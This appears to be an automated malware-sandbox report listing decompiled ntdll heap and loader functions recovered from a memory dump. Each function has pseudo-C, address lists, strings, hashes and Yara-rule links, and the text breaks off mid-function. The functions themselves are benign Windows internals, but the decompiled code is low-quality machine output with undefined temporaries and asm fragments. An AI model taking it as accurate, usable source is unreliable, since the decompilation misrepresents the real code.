String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: 46be26e13d96abcfac642087423f33f2f089316cb4bd749d7a4198edf639db10
Instruction ID: 1822db29b98719ee750db4e5e2fdfd3b3b54be767715612ae705d4d8d35796a4
Opcode Fuzzy Hash: 46be26e13d96abcfac642087423f33f2f089316cb4bd749d7a4198edf639db10
Instruction Fuzzy Hash: 49D1C0346006468FDB19CF68C9907BEB7F2FF88300F15856DDA9A9B345E370A945CB51

Uniqueness

Uniqueness Score: -1.00%

Function 015FA229, Relevance: 5.2, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E015FA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E015FDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E01619730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0169A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E01619660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E015DB150();
					} else {
						E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E015DB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E015F7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0169138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E015F7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E015F7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01691582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E015F7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E015F7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E01691582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0162D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x015fa229
0x015fa231
0x015fa23f
0x015fa242
0x015fa244
0x015fa24c
0x015fa255
0x015fa25a
0x015fa25f
0x01641c76
0x01641c78
0x01641c7e
0x01641c7f
0x01641c81
0x01641c82
0x01641c84
0x01641c89
0x01641c8b
0x01641c9e
0x01641c9e
0x01641cab
0x01641cb2
0x00000000
0x01641cb2
0x01641c8d
0x01641c92
0x00000000
0x00000000
0x01641c94
0x01641c98
0x00000000
0x00000000
0x00000000
0x01641c98
0x015fa265
0x015fa265
0x015fa266
0x015fa26f
0x015fa270
0x015fa276
0x015fa277
0x015fa279
0x015fa27e
0x015fa282
0x01641db5
0x01641dbb
0x01641dc1
0x01641dc5
0x01641de4
0x01641de9
0x01641dc7
0x01641ddc
0x01641de1
0x01641def
0x01641df3
0x01641df7
0x01641dfe
0x01641e06
0x015fa302
0x015fa308
0x015fa308
0x015fa288
0x015fa28d
0x015fa294
0x01641cc1
0x015fa29a
0x015fa29a
0x015fa29a
0x015fa29f
0x01641ccb
0x01641cd1
0x01641cd8
0x01641cea
0x01641cea
0x01641cd8
0x015fa2a9
0x015fa2af
0x015fa2bc
0x01641cfd
0x015fa2c2
0x015fa2c2
0x015fa2c2
0x015fa2c7
0x01641d07
0x01641d0d
0x01641d14
0x01641d1f
0x01641d21
0x01641d2c
0x01641d2c
0x01641d2c
0x01641d47
0x01641d47
0x01641d14
0x015fa2cd
0x015fa2d2
0x015fa2d9
0x01641d5a
0x015fa2df
0x015fa2df
0x015fa2df
0x015fa2e4
0x01641d69
0x01641d6b
0x01641d76
0x01641d76
0x01641d76
0x01641d91
0x01641d91
0x015fa2ea
0x015fa2f0
0x015fa2f5
0x01641da8
0x01641dad
0x01641dad
0x015fa2fd
0x015fa300
0x00000000

Strings

HEAP[%wZ]: , xrefs: 01641DD7
`, xrefs: 01641C8D
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 01641DF9
HEAP: , xrefs: 01641DE4

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: 4081ec2c19e0eede107b3faa245e89c9a404726044eeeb890fee1adc6aabda83
Instruction ID: 3c0c22b4e6a9676a17a324632ff7213b4214df2b57a63c7cd413d575c5557995
Opcode Fuzzy Hash: 4081ec2c19e0eede107b3faa245e89c9a404726044eeeb890fee1adc6aabda83
Instruction Fuzzy Hash: A651F3722046829FE722EB68CC44F677BE9FB85710F090868F695CB291D764E940C762

Uniqueness

Uniqueness Score: -1.00%

Function 01608E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01608E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x16cd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x16c8464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x16c5780 & 0x00000003) != 0) {
							E01655510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x16c5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0161B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x16c7984; // 0x1172c00
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x16c8464; // 0x74790110
					 *0x16cb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01609B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x16c5780 & 0x00000005) != 0) {
						_push(_t49);
						E01655510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x01608e0f
0x01608e16
0x01608e19
0x01608e1b
0x01608e21
0x01608e7f
0x01608e85
0x01649354
0x0164936c
0x01649371
0x0164937b
0x01649381
0x01649381
0x0164937b
0x01608e9d
0x01608e9d
0x01608e29
0x01608e2c
0x01608e38
0x01608e3e
0x01608e43
0x01608eb5
0x01608eb9
0x016492aa
0x016492af
0x016492e8
0x016492e8
0x016492af
0x01608eb9
0x01608e45
0x01608e53
0x01608e5b
0x01608e5f
0x01608e78
0x01608e78
0x01608e7d
0x01608ec3
0x01608ecd
0x01608ed2
0x01608ed2
0x01608ec5
0x01608ec5
0x00000000
0x01608e7d
0x01608e67
0x01608ea4
0x0164931a
0x00000000
0x00000000
0x01649320
0x01608ea4
0x01608e70
0x01649325
0x01649340
0x01649345
0x01649345
0x01608e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0164932A
minkernel\ntdll\ldrsnap.c, xrefs: 0164933B, 01649367
LdrpFindDllActivationContext, xrefs: 01649331, 0164935D
Querying the active activation context failed with status 0x%08lx, xrefs: 01649357

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: f15082f51ea074bc64aa30c1dccfd7cad70f6dbe43d3595ccc0097de945fc5fe
Instruction ID: 50f647b813183381e3b4595331ed6f22a53bee5ba800a146a2ed7b4cf7d09a61
Opcode Fuzzy Hash: f15082f51ea074bc64aa30c1dccfd7cad70f6dbe43d3595ccc0097de945fc5fe
Instruction Fuzzy Hash: BD412931E003159FDB3FEA1C8C8DA77BBADBB45358F09456AE904572D2E7706C808381

Uniqueness

Uniqueness Score: -1.00%

Function 016949A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

This is located in the %s field of the heap header., xrefs: 01694AD6
HEAP[%wZ]: , xrefs: 01694A3D, 01694AB7
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01694A61
HEAP: , xrefs: 01694A4A, 01694A5D, 01694A5F, 01694AC4

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: f323727080014e88fdbbe965961044628d39ea4398619da32c4f16bd8851d77b
Instruction ID: 8652b001ea196c9453c2ed607d6ef8d1a5e5bf07a36ef96157ecfd792dada067
Opcode Fuzzy Hash: f323727080014e88fdbbe965961044628d39ea4398619da32c4f16bd8851d77b
Instruction Fuzzy Hash: 40310E31200512EFDB20DBA9CDC8F6B77EDFB04A20F15415AF905DF259EA74A941CB68

Uniqueness

Uniqueness Score: -1.00%

Function 015F99BF, Relevance: 4.3, Strings: 3, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E015F99BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E0168FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E0169A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E0162D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E015DB150();
										} else {
											E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E015DB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x16c6378 = 1;
											asm("int3");
											 *0x16c6378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E015FA229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E015FA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E015FBC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E0169A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E015FA229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E015FA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E0162D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E015DB150();
								} else {
									E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E015DB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x16c6378 = 1;
									asm("int3");
									 *0x16c6378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E0168FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E0169A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E0162D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E015DB150();
													} else {
														E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E015DB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x16c6378 = 1;
														asm("int3");
														 *0x16c6378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E015FA229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E015FA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E015FBC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E0169A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E0162D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E015DB150();
													} else {
														E015DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E015DB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x16c6378 = 1;
														asm("int3");
														 *0x16c6378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E015FA229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E015FA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
